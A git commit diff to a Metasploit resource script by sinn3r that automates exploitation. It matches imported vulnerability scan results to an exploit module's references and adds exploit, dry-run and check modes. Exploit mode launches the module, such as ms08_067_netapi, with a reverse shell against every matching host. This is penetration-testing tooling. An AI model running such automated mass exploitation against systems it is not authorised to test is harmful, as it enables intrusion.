Rewrite how each mode is handled

unstable
sinn3r 2012-07-10 16:06:07 -05:00
parent b449c0e21c
commit ce107fbd6f
1 changed files with 49 additions and 29 deletions

View File

@ -1,4 +1,3 @@
<ruby>
#
# Print the help function
@ -6,25 +5,27 @@
def help_me
help = %Q|
Description:
This Metasploit RC file can be used to automate the exploitation process. Before
using this script, you should import your vulnerability results to Metasploit, and
then it will exploit each possible host when there is a match to one of the
references. A reverse shell is automatically selected for you, and will always
default to a suitable meterpreter.
This Metasploit RC file can be used to automate the exploitation process. Before using the
script, you must import your vulnerability results to Metasploit so that it can deploy the
module based on matching references. Three modes are available: exploit/dry/and check.
In exploit mode, it will attempt to gain access to all vulnerable hosts with the most
suitable reverse shell that's automatically selected. In "dry" mode (dry-run), it'll list
all the hosts vulnerable to the exploit. In check mode, it will only trigger the check()
function found in the module. If no mode is specified, then it'll default to 'exploit'.
Usage:
./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode]
Arguments:
rc_path - Full path to the RC script
db_user - Username for MSF database (datastore: 'DB_USER')
db_pass - Password for MSF database (datastore: 'DB_PASS')
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
module_path - Path to the exploit (datastore: 'MODULE')
mode - Optional. Dry-run mode [dry/check] (datastore: 'MODE')
db_user - Username for MSF database (datastore: 'DB_USER')
db_pass - Password for MSF database (datastore: 'DB_PASS')
db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE')
module_path - Path to the exploit (datastore: 'MODULE')
mode - Optional. Accept:exploit/dry/check (datastore: 'MODE')
Example:
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi dry
Example of running an exploit:
msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi
Authors:
sinn3r <sinn3r[at]metasploit.com>
@ -114,7 +115,7 @@ end
#
# Start the exploitation
# Exploit mode
#
def auto_exploit(module_path)
exploit = load_exploit(module_path)
@ -146,9 +147,9 @@ end
#
# Find all mathing references
# Dry-run mode
#
def dry_run(module_path,mode)
def dry_run(module_path)
exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
@ -157,15 +158,29 @@ def dry_run(module_path,mode)
framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs)
addr = vuln.host.address.to_s
print_good("#{addr} seems vulnerable to #{exploit.shortname}")
if mode == "check"
print_good("checking #{addr} with check mechanism of #{exploit.shortname}")
run_single("use #{exploit.fullname}")
run_single("set RHOST #{addr}")
run_single("check")
run_single("back")
print_line("")
end
print_good("#{addr} has a matching reference to #{exploit.shortname}")
end
end
#
# Check mode
#
def check_exploit(module_path)
exploit = load_exploit(module_path)
raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
exploit_refs = exploit.references
framework.db.workspace.vulns.each do |vuln|
next if not ref_has_match(vuln.refs, exploit_refs)
print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}")
run_single("use #{exploit.fullname}")
run_single("set RHOST #{vuln.host.address.to_s}")
run_single("check")
select(nil, nil, nil, 1)
run_single("back")
print_line()
end
end
@ -198,7 +213,7 @@ def init_args
args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || ''
args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
args[:module] = ARGV.shift || datastore['MODULE'] || ''
args[:mode] = (ARGV.shift || datastore['MODE'] || '')
args[:mode] = ARGV.shift || datastore['MODE'] || 'exploit'
raise ArgumentError, "Missing a module path" if args[:module].empty?
@ -223,10 +238,15 @@ begin
end
end
if (args[:mode] == "dry" or args[:mode] == "check")
dry_run(args[:module], args[:mode])
else
case args[:mode]
when /^exploit$/i
auto_exploit(args[:module])
when /^dry$/i
dry_run(args[:module])
when /^check$/i
check_exploit(args[:module])
else
raise ArgumentError, "Invalid mode"
end
rescue ArgumentError => e